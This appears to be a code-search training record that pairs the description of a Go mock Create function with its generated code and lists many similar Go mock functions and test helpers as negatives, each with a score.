*WebhooksIntegrationCustomVariableResponse) SetIsSecret(v bool) {\n\to.IsSecret = v\n}", "func ConvertTerraformJSONContent(removeQuotes, removeDelimiters bool, inputTemplate string, JSONContent []byte, outputFilename string) {\n\tvar result string\n\tdata, err := softwareupgrade.ReadDataFromFile(inputTemplate)\n\tif err != nil {\n\t\tfmt.Printf(\"Error reading from: %s due to %v\\n\", inputTemplate, err)\n\t\treturn\n\t}\n\tresult = string(data)\n\tdata = JSONContent\n\tvar TerraformOutput map[string]TerraformNode\n\terr = json.Unmarshal(data, &TerraformOutput)\n\tif err != nil {\n\t\tlog.Printf(\"Error parsing Terraform JSON: %v\\n\", err)\n\t\tlog.Fatalln(\"Most probable cause of error is forgetting to add -json to terraform output\")\n\t}\n\tfor k, v := range TerraformOutput {\n\t\tvar (\n\t\t\tnodes []string\n\t\t)\n\t\tswitch v.Type {\n\t\tcase \"map\":\n\t\t\t{\n\t\t\t\tfor _, v := range v.Value.(map[string]interface{}) {\n\t\t\t\t\tfor _, node := range v.([]interface{}) {\n\t\t\t\t\t\tnodes = append(nodes, node.(string))\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\tcase \"list\":\n\t\t\t{\n\t\t\t\tlist := v.Value.([]interface{})\n\t\t\t\tfor i := range list {\n\t\t\t\t\tnodes = append(nodes, list[i].(string))\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tvar nodeStr, nodeFormat, appendFormat string\n\t\tif removeQuotes || removeDelimiters {\n\t\t\tnodeFormat = \"%s\"\n\t\t} else {\n\t\t\tnodeFormat = `\"%s\"`\n\t\t}\n\t\tif removeDelimiters {\n\t\t\tappendFormat = \"%s %s\"\n\t\t} else {\n\t\t\tappendFormat = \"%s,\\n%s\"\n\t\t}\n\t\tfor _, node := range nodes {\n\t\t\tquotedNode := fmt.Sprintf(nodeFormat, node)\n\t\t\tif nodeStr == \"\" {\n\t\t\t\tnodeStr = quotedNode\n\t\t\t} else {\n\t\t\t\tnodeStr = fmt.Sprintf(appendFormat, nodeStr, quotedNode)\n\t\t\t}\n\t\t}\n\t\treplacementTemplate := fmt.Sprintf(\"{%%%s}\", k)\n\t\tresult = strings.Replace(result, replacementTemplate, nodeStr, 1)\n\t}\n\tdata = []byte(result)\n\t_, err = softwareupgrade.SaveDataToFile(outputFilename, data)\n\tif err == nil {\n\t\tfmt.Println(\"Terraform output conversion completed.\")\n\t} else {\n\t\tlog.Printf(\"Error saving %s due to error: %v\\n\", outputFilename, err)\n\t\tlog.Fatalln(\"Aborting.\")\n\t}\n\n}" ]
[ "0.6179236", "0.5799094", "0.52540725", "0.515004", "0.51190156", "0.5062301", "0.50266254", "0.49973863", "0.49073693", "0.489995", "0.48877433", "0.48646992", "0.48484105", "0.4844005", "0.4831506", "0.4827381", "0.48271757", "0.48162967", "0.4793151", "0.47895056", "0.47775036", "0.47653565", "0.47389108", "0.47265515", "0.47257292", "0.47123712", "0.46943367", "0.46768862", "0.46346867", "0.4592582", "0.45886692", "0.45828763", "0.458171", "0.45732448", "0.4555352", "0.45461535", "0.45321742", "0.45210496", "0.4504241", "0.44746858", "0.44728297", "0.447218", "0.44667175", "0.4453179", "0.444191", "0.44319174", "0.44289237", "0.44285426", "0.44278866", "0.44256502", "0.442438", "0.44167948", "0.44121996", "0.44098455", "0.44041827", "0.4394506", "0.43841666", "0.43820742", "0.43796372", "0.43790793", "0.43766114", "0.4373803", "0.43703112", "0.4368078", "0.4367941", "0.4367101", "0.43660647", "0.43645787", "0.43628028", "0.43513915", "0.4343", "0.43415713", "0.43397608", "0.4336146", "0.43301854", "0.43149513", "0.43010733", "0.43010393", "0.4299646", "0.42996207", "0.42924005", "0.42923114", "0.4292155", "0.42825767", "0.427741", "0.42723507", "0.42703328", "0.42683527", "0.42672208", "0.4264092", "0.426174", "0.4253548", "0.42518625", "0.42429438", "0.42372945", "0.42363614", "0.4229673", "0.42272824", "0.42252573", "0.42252418" ]
0.7421397
0
Create provides a mock function with given fields: ctx, in
func (_m *ConstraintReferenceService) Create(ctx context.Context, in *model.FormationTemplateConstraintReference) error { ret := _m.Called(ctx, in) var r0 error if rf, ok := ret.Get(0).(func(context.Context, *model.FormationTemplateConstraintReference) error); ok { r0 = rf(ctx, in) } else { r0 = ret.Error(0) } return r0 }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (_m *MockInterface) Create(ctx context.Context, key string, val string) error {\n\tret := _m.Called(ctx, key, val)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, string, string) error); ok {\n\t\tr0 = rf(ctx, key, val)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *ExecutionManager) Create(ctx context.Context, vendorType string, vendorID int64, trigger string, extraAttrs ...map[string]interface{}) (int64, error) {\n\t_va := make([]interface{}, len(extraAttrs))\n\tfor _i := range extraAttrs {\n\t\t_va[_i] = extraAttrs[_i]\n\t}\n\tvar _ca []interface{}\n\t_ca = append(_ca, ctx, vendorType, vendorID, trigger)\n\t_ca = append(_ca, _va...)\n\tret := _m.Called(_ca...)\n\n\tvar r0 int64\n\tvar r1 error\n\tif rf, ok := ret.Get(0).(func(context.Context, string, int64, string, ...map[string]interface{}) (int64, error)); ok {\n\t\treturn rf(ctx, vendorType, vendorID, trigger, extraAttrs...)\n\t}\n\tif rf, ok := ret.Get(0).(func(context.Context, string, int64, string, ...map[string]interface{}) int64); ok {\n\t\tr0 = rf(ctx, vendorType, vendorID, trigger, extraAttrs...)\n\t} else {\n\t\tr0 = ret.Get(0).(int64)\n\t}\n\n\tif rf, ok := ret.Get(1).(func(context.Context, string, int64, string, ...map[string]interface{}) error); ok {\n\t\tr1 = rf(ctx, vendorType, vendorID, trigger, extraAttrs...)\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}", "func (m *MockDelegateActor) WrapInCreate(c context.Context, value vocab.Type, outboxIRI *url.URL) (vocab.ActivityStreamsCreate, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"WrapInCreate\", c, value, outboxIRI)\n\tret0, _ := ret[0].(vocab.ActivityStreamsCreate)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (_m *ArticleUsecase) Create(_a0 context.Context, _a1 *domain.Article) error {\n\tret := _m.Called(_a0, _a1)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, *domain.Article) error); ok {\n\t\tr0 = rf(_a0, _a1)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (o *FakeObject) New(args ...interface{}) Object { return o.Invoke(args) }", "func createMockContext(t *testing.T, mockArgs []string) *cli.Context {\n\tt.Log(\"Create mock context\")\n\tmockApp := cli.NewApp()\n\n\tmockSet := flag.NewFlagSet(\"mock\", 0)\n\t//mockArgs := []string{\"TESTDIR\"}\n\tmockSet.Parse(mockArgs)\n\n\treturn cli.NewContext(mockApp, mockSet, nil)\n}", "func (_m *RuntimeServiceServer) Create(_a0 context.Context, _a1 *runtimepb.Request) (*runtimepb.Response, error) {\n\tret := _m.Called(_a0, _a1)\n\n\tvar r0 *runtimepb.Response\n\tif rf, ok := ret.Get(0).(func(context.Context, *runtimepb.Request) *runtimepb.Response); ok {\n\t\tr0 = rf(_a0, _a1)\n\t} else {\n\t\tif ret.Get(0) != nil {\n\t\t\tr0 = ret.Get(0).(*runtimepb.Response)\n\t\t}\n\t}\n\n\tvar r1 error\n\tif rf, ok := ret.Get(1).(func(context.Context, *runtimepb.Request) error); ok {\n\t\tr1 = rf(_a0, _a1)\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}", "func createRequest(t *testing.T, method string, path string, body io.Reader) (*http.Request, *httptest.ResponseRecorder, *bytes.Buffer) {\n\trecorder := httptest.NewRecorder()\n\treq, err := http.NewRequest(method, path, body)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\tlogger, output := NewFakeLogger()\n\treq = req.WithContext(context.WithValue(req.Context(), middleware.LoggerKey, &logger))\n\treq = req.WithContext(context.WithValue(req.Context(), middleware.AuthUserKey, \"test@draupnir\"))\n\treq = req.WithContext(context.WithValue(req.Context(), middleware.RefreshTokenKey, \"refresh-token\"))\n\treq = req.WithContext(context.WithValue(req.Context(), middleware.UserIPAddressKey, \"1.2.3.4\"))\n\n\treturn req, recorder, output\n}", "func (_m *Usecase) Create(ctx context.Context, ar *models.NewCommandAdmin, user string) error {\n\tret := _m.Called(ctx, ar,user)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, *models.NewCommandAdmin,string) error); ok {\n\t\tr0 = rf(ctx, ar,user)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func Create(ctx *gin.Context) {\n\n}", "func (_m *Usecase) Create(ctx context.Context, f models.NewCommandPromo, token string) (*models.NewCommandPromo, error) {\n\tret := _m.Called(ctx, f, token)\n\n\tvar r0 *models.NewCommandPromo\n\tif rf, ok := ret.Get(0).(func(context.Context, models.NewCommandPromo, string) *models.NewCommandPromo); ok {\n\t\tr0 = rf(ctx, f, token)\n\t} else {\n\t\tif ret.Get(0) != nil {\n\t\t\tr0 = ret.Get(0).(*models.NewCommandPromo)\n\t\t}\n\t}\n\n\tvar r1 error\n\tif rf, ok := ret.Get(1).(func(context.Context, models.NewCommandPromo, string) error); ok {\n\t\tr1 = rf(ctx, f, token)\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}", "func (_m *K8sClient) Create(_a0 context.Context, _a1 client.Object, _a2 ...client.CreateOption) error {\n\t_va := make([]interface{}, len(_a2))\n\tfor _i := range _a2 {\n\t\t_va[_i] = _a2[_i]\n\t}\n\tvar _ca []interface{}\n\t_ca = append(_ca, _a0, _a1)\n\t_ca = append(_ca, _va...)\n\tret := _m.Called(_ca...)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, client.Object, ...client.CreateOption) error); ok {\n\t\tr0 = rf(_a0, _a1, _a2...)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *MockDatastore) Create(txn Transaction) error {\n\tret := _m.Called(txn)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(Transaction) error); ok {\n\t\tr0 = rf(txn)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *CIPDClient) Create(ctx context.Context, name string, dir string, installMode pkg.InstallMode, excludeMatchingFiles []*regexp.Regexp, refs []string, tags []string, metadata map[string]string) (common.Pin, error) {\n\tret := _m.Called(ctx, name, dir, installMode, excludeMatchingFiles, refs, tags, metadata)\n\n\tvar r0 common.Pin\n\tif rf, ok := ret.Get(0).(func(context.Context, string, string, pkg.InstallMode, []*regexp.Regexp, []string, []string, map[string]string) common.Pin); ok {\n\t\tr0 = rf(ctx, name, dir, installMode, excludeMatchingFiles, refs, tags, metadata)\n\t} else {\n\t\tr0 = ret.Get(0).(common.Pin)\n\t}\n\n\tvar r1 error\n\tif rf, ok := ret.Get(1).(func(context.Context, string, string, pkg.InstallMode, []*regexp.Regexp, []string, []string, map[string]string) error); ok {\n\t\tr1 = rf(ctx, name, dir, installMode, excludeMatchingFiles, refs, tags, metadata)\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}", "func callCreate(repo interface{}, methodName string, ctx context.Context, tenant string, modelEntity interface{}) error {\n\targs := []reflect.Value{reflect.ValueOf(ctx)}\n\tif len(tenant) > 0 {\n\t\targs = append(args, reflect.ValueOf(tenant))\n\t}\n\targs = append(args, reflect.ValueOf(modelEntity))\n\tresults := reflect.ValueOf(repo).MethodByName(methodName).Call(args)\n\tif len(results) != 1 {\n\t\tpanic(\"Create should return one argument\")\n\t}\n\tresult := results[0].Interface()\n\tif result == nil {\n\t\treturn nil\n\t}\n\terr, ok := result.(error)\n\tif !ok {\n\t\tpanic(\"Expected result to be an error\")\n\t}\n\treturn err\n}", "func (m *MockFlag) Create(arg0 context.Context, arg1 flaggio.NewFlag) (string, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"Create\", arg0, arg1)\n\tret0, _ := ret[0].(string)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (_m *MockBookingStorage) Create(_a0 interface{}) {\n\t_m.Called(_a0)\n}", "func (_m *AppSvc) Create(ctx context.Context, projectName string, reqData *requests.CreateApp) error {\n\tret := _m.Called(ctx, projectName, reqData)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, string, *requests.CreateApp) error); ok {\n\t\tr0 = rf(ctx, projectName, reqData)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *IPaymentCodeUsecase) Create(ctx context.Context, request domain.CreatePaymentCodeRequestPayload) (domain.PaymentCode, error) {\n\tret := _m.Called(ctx, request)\n\n\tvar r0 domain.PaymentCode\n\tif rf, ok := ret.Get(0).(func(context.Context, domain.CreatePaymentCodeRequestPayload) domain.PaymentCode); ok {\n\t\tr0 = rf(ctx, request)\n\t} else {\n\t\tr0 = ret.Get(0).(domain.PaymentCode)\n\t}\n\n\tvar r1 error\n\tif rf, ok := ret.Get(1).(func(context.Context, domain.CreatePaymentCodeRequestPayload) error); ok {\n\t\tr1 = rf(ctx, request)\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}", "func (_m *Usecase) Create(ctx context.Context, domain activities.Domain, pocketId int) (activities.Domain, error) {\n\tret := _m.Called(ctx, domain, pocketId)\n\n\tvar r0 activities.Domain\n\tif rf, ok := ret.Get(0).(func(context.Context, activities.Domain, int) activities.Domain); ok {\n\t\tr0 = rf(ctx, domain, pocketId)\n\t} else {\n\t\tr0 = ret.Get(0).(activities.Domain)\n\t}\n\n\tvar r1 error\n\tif rf, ok := ret.Get(1).(func(context.Context, activities.Domain, int) error); ok {\n\t\tr1 = rf(ctx, domain, pocketId)\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}", "func CreateMock(method interface{}, url interface{}, headers interface{}, body interface{}) *go_mock_yourself_http.Mock {\n\tmockRequest := new(go_mock_yourself_http.Request)\n\n\tif method != nil {\n\t\tmockRequest.SetMethod(method)\n\t}\n\n\tif url != nil {\n\t\tmockRequest.SetUrl(url)\n\t}\n\n\tif body != nil {\n\t\tmockRequest.SetBody(body)\n\t}\n\n\tif headers != nil {\n\t\tmockRequest.SetHeaders(headers)\n\t}\n\n\tmockResponse := new(go_mock_yourself_http.Response)\n\tmockResponse.SetStatusCode(222)\n\tmockResponse.SetBody(\"i'm a cute loving mock, almost as cute as mumi, bichi and rasti\")\n\n\tmock, _ := go_mock_yourself_http.NewMock(\"my lovely testing mock\", mockRequest, mockResponse)\n\treturn mock\n}", "func (_m *MockRepository) Create(scope *jsonapi.Scope) *unidb.Error {\n\tret := _m.Called(scope)\n\n\tvar r0 *unidb.Error\n\tif rf, ok := ret.Get(0).(func(*jsonapi.Scope) *unidb.Error); ok {\n\t\tr0 = rf(scope)\n\t} else {\n\t\tif ret.Get(0) != nil {\n\t\t\tr0 = ret.Get(0).(*unidb.Error)\n\t\t}\n\t}\n\n\treturn r0\n}", "func (_m *EventAPIRepository) Create(ctx context.Context, tenant string, item *model.EventDefinition) error {\n\tret := _m.Called(ctx, tenant, item)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, string, *model.EventDefinition) error); ok {\n\t\tr0 = rf(ctx, tenant, item)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (m *MockTodoServiceClient) Create(ctx context.Context, in *v1.CreateRequest, opts ...grpc.CallOption) (*v1.CreateResponse, error) {\n\tm.ctrl.T.Helper()\n\tvarargs := []interface{}{ctx, in}\n\tfor _, a := range opts {\n\t\tvarargs = append(varargs, a)\n\t}\n\tret := m.ctrl.Call(m, \"Create\", varargs...)\n\tret0, _ := ret[0].(*v1.CreateResponse)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (_m *BundleRepository) Create(ctx context.Context, tenant string, item *model.Bundle) error {\n\tret := _m.Called(ctx, tenant, item)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, string, *model.Bundle) error); ok {\n\t\tr0 = rf(ctx, tenant, item)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *ProductBackend) Create(product *model.Product) error {\n\tret := _m.Called(product)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(*model.Product) error); ok {\n\t\tr0 = rf(product)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *Usecase) Create(ctx context.Context, _a1 *models.Category) error {\n\tret := _m.Called(ctx, _a1)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, *models.Category) error); ok {\n\t\tr0 = rf(ctx, _a1)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *RecordRepositoryI) Create(tx database.TransactionI, id int) error {\n\tret := _m.Called(tx, id)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(database.TransactionI, int) error); ok {\n\t\tr0 = rf(tx, id)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (m *MockAuthCheckerClient) Create(arg0 context.Context, arg1 *auth.Session, arg2 ...grpc.CallOption) (*auth.SessionToken, error) {\n\tm.ctrl.T.Helper()\n\tvarargs := []interface{}{arg0, arg1}\n\tfor _, a := range arg2 {\n\t\tvarargs = append(varargs, a)\n\t}\n\tret := m.ctrl.Call(m, \"Create\", varargs...)\n\tret0, _ := ret[0].(*auth.SessionToken)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (m *MockLoggingClient) Create(arg0 context.Context, arg1 *logging.LoggingRequest, arg2 ...grpc.CallOption) (*logging.LoggingResponse, error) {\n\tvarargs := []interface{}{arg0, arg1}\n\tfor _, a := range arg2 {\n\t\tvarargs = append(varargs, a)\n\t}\n\tret := m.ctrl.Call(m, \"Create\", varargs...)\n\tret0, _ := ret[0].(*logging.LoggingResponse)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (_m *SecretService) Create(ctx context.Context, projectID int32, secret mlp.Secret) (mlp.Secret, error) {\n\tret := _m.Called(ctx, projectID, secret)\n\n\tvar r0 mlp.Secret\n\tif rf, ok := ret.Get(0).(func(context.Context, int32, mlp.Secret) mlp.Secret); ok {\n\t\tr0 = rf(ctx, projectID, secret)\n\t} else {\n\t\tr0 = ret.Get(0).(mlp.Secret)\n\t}\n\n\tvar r1 error\n\tif rf, ok := ret.Get(1).(func(context.Context, int32, mlp.Secret) error); ok {\n\t\tr1 = rf(ctx, projectID, secret)\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}", "func newTestRequest(method string, url string, body io.Reader, token string) (echo.Context, *httptest.ResponseRecorder) {\n\n\t// Setup echo framework\n\te = echo.New()\n\n\t// Register URL endpoints (skip middleware for these tests as they read the request body and ruin it)\n\th.RegisterRouteHandlers(e)\n\n\treq := httptest.NewRequest(method, url, body)\n\treq.Header.Set(echo.HeaderContentType, echo.MIMEApplicationJSON)\n\tif token != \"\" {\n\t\treq.Header.Set(echo.HeaderAuthorization, \"Bearer \"+token)\n\t}\n\n\trec := httptest.NewRecorder()\n\tc := e.NewContext(req, rec)\n\n\treturn c, rec\n}", "func (_m *Blank) Create(x interface{}) error {\n\tret := _m.Called(x)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(interface{}) error); ok {\n\t\tr0 = rf(x)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *MockORM) Create(value interface{}) ORM {\n\tret := _m.Called(value)\n\n\tvar r0 ORM\n\tif rf, ok := ret.Get(0).(func(interface{}) ORM); ok {\n\t\tr0 = rf(value)\n\t} else {\n\t\tif ret.Get(0) != nil {\n\t\t\tr0 = ret.Get(0).(ORM)\n\t\t}\n\t}\n\n\treturn r0\n}", "func (_m *VolumeSnapshotter) Create(_a0 context.Context, _a1 string, _a2 string, _a3 gopowerstore.Client) (gopowerstore.CreateResponse, error) {\n\tret := _m.Called(_a0, _a1, _a2, _a3)\n\n\tvar r0 gopowerstore.CreateResponse\n\tif rf, ok := ret.Get(0).(func(context.Context, string, string, gopowerstore.Client) gopowerstore.CreateResponse); ok {\n\t\tr0 = rf(_a0, _a1, _a2, _a3)\n\t} else {\n\t\tr0 = ret.Get(0).(gopowerstore.CreateResponse)\n\t}\n\n\tvar r1 error\n\tif rf, ok := ret.Get(1).(func(context.Context, string, string, gopowerstore.Client) error); ok {\n\t\tr1 = rf(_a0, _a1, _a2, _a3)\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}", "func (_m *BundleRepository) CreateGlobal(ctx context.Context, _a1 *model.Bundle) error {\n\tret := _m.Called(ctx, _a1)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, *model.Bundle) error); ok {\n\t\tr0 = rf(ctx, _a1)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *OrderRepository) Create(newOrder *order.Order) error {\n\tret := _m.Called(newOrder)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(*order.Order) error); ok {\n\t\tr0 = rf(newOrder)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *UserRepositoryI) Create(tx database.TransactionI, user *models.UserPrivateInfo) (int, error) {\n\tret := _m.Called(tx, user)\n\n\tvar r0 int\n\tif rf, ok := ret.Get(0).(func(database.TransactionI, *models.UserPrivateInfo) int); ok {\n\t\tr0 = rf(tx, user)\n\t} else {\n\t\tr0 = ret.Get(0).(int)\n\t}\n\n\tvar r1 error\n\tif rf, ok := ret.Get(1).(func(database.TransactionI, *models.UserPrivateInfo) error); ok {\n\t\tr1 = rf(tx, user)\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}", "func (_m *VolumeCreator) Create(ctx context.Context, req *csi.CreateVolumeRequest, sizeInBytes int64, client gopowerstore.Client) (gopowerstore.CreateResponse, error) {\n\tret := _m.Called(ctx, req, sizeInBytes, client)\n\n\tvar r0 gopowerstore.CreateResponse\n\tif rf, ok := ret.Get(0).(func(context.Context, *csi.CreateVolumeRequest, int64, gopowerstore.Client) gopowerstore.CreateResponse); ok {\n\t\tr0 = rf(ctx, req, sizeInBytes, client)\n\t} else {\n\t\tr0 = ret.Get(0).(gopowerstore.CreateResponse)\n\t}\n\n\tvar r1 error\n\tif rf, ok := ret.Get(1).(func(context.Context, *csi.CreateVolumeRequest, int64, gopowerstore.Client) error); ok {\n\t\tr1 = rf(ctx, req, sizeInBytes, client)\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}", "func (m *MockHTTP) Create(w http.ResponseWriter, r *http.Request) {\n\tm.ctrl.T.Helper()\n\tm.ctrl.Call(m, \"Create\", w, r)\n}", "func (m *MockTopoClient) Create(ctx context.Context, in *topo.CreateRequest, opts ...grpc.CallOption) (*topo.CreateResponse, error) {\n\tm.ctrl.T.Helper()\n\tvarargs := []interface{}{ctx, in}\n\tfor _, a := range opts {\n\t\tvarargs = append(varargs, a)\n\t}\n\tret := m.ctrl.Call(m, \"Create\", varargs...)\n\tret0, _ := ret[0].(*topo.CreateResponse)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (_m *TenantRepository) Create(ctx context.Context, item model.TenantModel) error {\n\tret := _m.Called(ctx, item)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, model.TenantModel) error); ok {\n\t\tr0 = rf(ctx, item)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func newReq(json string, ctx echo.Context) (newCtx echo.Context, rec *httptest.ResponseRecorder) {\n\treq := httptest.NewRequest(http.MethodPost, \"/\", strings.NewReader(json))\n\treq.Header.Set(echo.HeaderContentType, echo.MIMEApplicationJSON)\n\trec = httptest.NewRecorder()\n\tnewCtx = ctx.Echo().NewContext(req, rec)\n\treturn\n}", "func (m *MockArgusdClient) CreateWatch(arg0 context.Context, arg1 *golang.ArgusdConfig, arg2 ...grpc.CallOption) (*golang.ArgusdHandle, error) {\n\tvarargs := []interface{}{arg0, arg1}\n\tfor _, a := range arg2 {\n\t\tvarargs = append(varargs, a)\n\t}\n\tret := m.ctrl.Call(m, \"CreateWatch\", varargs...)\n\tret0, _ := ret[0].(*golang.ArgusdHandle)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (_m *AWSResourceManager) Create(_a0 context.Context, _a1 types.AWSResource) (types.AWSResource, error) {\n\tret := _m.Called(_a0, _a1)\n\n\tvar r0 types.AWSResource\n\tif rf, ok := ret.Get(0).(func(context.Context, types.AWSResource) types.AWSResource); ok {\n\t\tr0 = rf(_a0, _a1)\n\t} else {\n\t\tif ret.Get(0) != nil {\n\t\t\tr0 = ret.Get(0).(types.AWSResource)\n\t\t}\n\t}\n\n\tvar r1 error\n\tif rf, ok := ret.Get(1).(func(context.Context, types.AWSResource) error); ok {\n\t\tr1 = rf(_a0, _a1)\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}", "func (_m *EventAPIRepository) CreateGlobal(ctx context.Context, item *model.EventDefinition) error {\n\tret := _m.Called(ctx, item)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, *model.EventDefinition) error); ok {\n\t\tr0 = rf(ctx, item)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (m *MockLikeRepository) Create(ctx context.Context, postID int, userReferenceID string) error {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"Create\", ctx, postID, userReferenceID)\n\tret0, _ := ret[0].(error)\n\treturn ret0\n}", "func (m *MockCreateHandler) Create(arg0 context.Context, arg1 bool, arg2 *handlers.CreateParams) error {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"Create\", arg0, arg1, arg2)\n\tret0, _ := ret[0].(error)\n\treturn ret0\n}", "func (m *MockLibraryStore) CreateRequest(arg0 context.Context, arg1 *types.Request) (*types.Book, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"CreateRequest\", arg0, arg1)\n\tret0, _ := ret[0].(*types.Book)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func createRepo(repoConstructorFunc interface{}, convMock interface{}) interface{} {\n\tv := reflect.ValueOf(repoConstructorFunc)\n\tif v.Kind() != reflect.Func {\n\t\tpanic(\"Repo constructor should be a function\")\n\t}\n\tt := v.Type()\n\n\tif t.NumOut() != 1 {\n\t\tpanic(\"Repo constructor should return only one argument\")\n\t}\n\n\tif t.NumIn() == 0 {\n\t\treturn v.Call(nil)[0].Interface()\n\t}\n\n\tif t.NumIn() != 1 {\n\t\tpanic(\"Repo constructor should accept zero or one arguments\")\n\t}\n\n\tmockVal := reflect.ValueOf(convMock)\n\treturn v.Call([]reflect.Value{mockVal})[0].Interface()\n}", "func (mmCreate *mPaymentRepositoryMockCreate) When(ctx context.Context, from int64, to int64, amount int64) *PaymentRepositoryMockCreateExpectation {\n\tif mmCreate.mock.funcCreate != nil {\n\t\tmmCreate.mock.t.Fatalf(\"PaymentRepositoryMock.Create mock is already set by Set\")\n\t}\n\n\texpectation := &PaymentRepositoryMockCreateExpectation{\n\t\tmock: mmCreate.mock,\n\t\tparams: &PaymentRepositoryMockCreateParams{ctx, from, to, amount},\n\t}\n\tmmCreate.expectations = append(mmCreate.expectations, expectation)\n\treturn expectation\n}", "func (_m *RatingRepository) Create(ctx context.Context, a *models.Rating) (int64, error) {\n\tret := _m.Called(ctx, a)\n\n\tvar r0 int64\n\tif rf, ok := ret.Get(0).(func(context.Context, *models.Rating) int64); ok {\n\t\tr0 = rf(ctx, a)\n\t} else {\n\t\tr0 = ret.Get(0).(int64)\n\t}\n\n\tvar r1 error\n\tif rf, ok := ret.Get(1).(func(context.Context, *models.Rating) error); ok {\n\t\tr1 = rf(ctx, a)\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}", "func (m *FakeApiServer) Create(arg0 schema.GroupVersionResource, arg1 string, arg2 runtime.Object) (runtime.Object, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"Create\", arg0, arg1, arg2)\n\tret0, _ := ret[0].(runtime.Object)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func NewMockCtx(method, path string) *Ctx {\n\treturn NewCtx(webutil.NewMockResponse(new(bytes.Buffer)), webutil.NewMockRequest(method, path))\n}", "func MockCreateResponse(t *testing.T) {\n\tth.Mux.HandleFunc(shareEndpoint, func(w http.ResponseWriter, r *http.Request) {\n\t\tth.TestMethod(t, r, \"POST\")\n\t\tth.TestHeader(t, r, \"X-Auth-Token\", fake.TokenID)\n\t\tth.TestHeader(t, r, \"Content-Type\", \"application/json\")\n\t\tth.TestHeader(t, r, \"Accept\", \"application/json\")\n\t\tth.TestJSONRequest(t, r, createRequest)\n\t\tw.Header().Add(\"Content-Type\", \"application/json\")\n\t\tw.WriteHeader(http.StatusOK)\n\t\tfmt.Fprintf(w, createResponse)\n\t})\n}", "func (m 